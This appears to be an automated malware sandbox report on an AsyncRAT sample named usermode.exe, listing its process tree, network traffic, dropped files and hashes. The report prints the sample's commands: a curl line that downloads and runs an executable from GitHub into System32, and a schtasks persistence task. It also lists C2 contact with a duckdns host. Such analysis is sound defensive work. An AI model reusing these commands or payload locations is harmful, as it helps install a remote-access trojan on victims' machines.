Analysis Overview
SHA256
7cbd57fe2ffbaa6da63c865cce81eaf33c083e0b23d69cde51ada9f91f309a99
Threat Level: Known bad
The file usermode.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Enumerates physical storage devices
Unsigned PE
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-20 04:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 04:13
Reported
2024-06-20 04:14
Platform
win7-20240419-en
Max time kernel
63s
Max time network
65s
Command Line
Signatures
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.171:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| N/A | 127.0.0.1:49188 | N/A | tcp |
| N/A | 127.0.0.1:49190 | N/A | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-20 04:13
Reported
2024-06-20 04:16
Platform
win10v2004-20240611-en
Max time kernel
140s
Max time network
148s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\boot_cnfg_x32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\boot_cnfg_x32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\boot_cnfg_x32.exe | C:\Windows\system32\curl.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\boot_cnfg_x32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Update.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\usermode.exe
"C:\Users\Admin\AppData\Local\Temp\usermode.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\system32\curl.exe
curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\System32\boot_cnfg_x32.exe
C:\\Windows\\System32\\boot_cnfg_x32.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\usermode.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Users\Admin\AppData\Roaming\Update.exe
"C:\Users\Admin\AppData\Roaming\Update.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| GB | 87.248.205.0:80 | N/A | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| N/A | 127.0.0.1:49840 | N/A | tcp |
| N/A | 127.0.0.1:49842 | N/A | tcp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 20.189.173.15:443 | N/A | tcp |
| US | 8.8.8.8:53 | hmnms.duckdns.org | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:49869 | N/A | tcp |
| N/A | 127.0.0.1:49871 | N/A | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hmnms.duckdns.org | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
| CH | 51.154.225.5:2035 | hmnms.duckdns.org | tcp |
Files
C:\Windows\System32\boot_cnfg_x32.exe
| MD5 | 8f601efcbf3eb183bbd6500296b9ccd2 |
| SHA1 | 2542d3fe0e97fa969c0ef8e86676ba1c72e6e846 |
| SHA256 | 5e4a8ebbeb1b7288087c65c0f5edf6d6016528f2bf5104cfc7fd5b315bf1affd |
| SHA512 | d101aa1cc4281e29813aaa269b26d9e500a0ee042024273a636fc06d59d4af30d04d1670a58e54d3263cb6dfe9b67c71ef58c4175628841f2c8719260f548d08 |
memory/4500-4-0x00007FFA041D3000-0x00007FFA041D5000-memory.dmp
memory/4500-5-0x00000000009F0000-0x0000000000A02000-memory.dmp
memory/4500-6-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp
memory/4500-11-0x00007FFA041D0000-0x00007FFA04C91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpE62A.tmp.bat
| MD5 | 2c8bc37b47cf08664a78ebbffd76d23b |
| SHA1 | 49e2f3d19a7b9edd662b9763ae47629496ca4758 |
| SHA256 | 8a0da6a175df4c5ab306e7a27093f37aa60ef6f86f5e50d2b5c49fe991fad73a |
| SHA512 | b81d18a37f816146daf286018ae6eea6ef888abb817d3db62d0552b7214494c5d2fd9a352176c84811a04581e3660da5c17a48aed696cd8feaaf0ee32f179648 |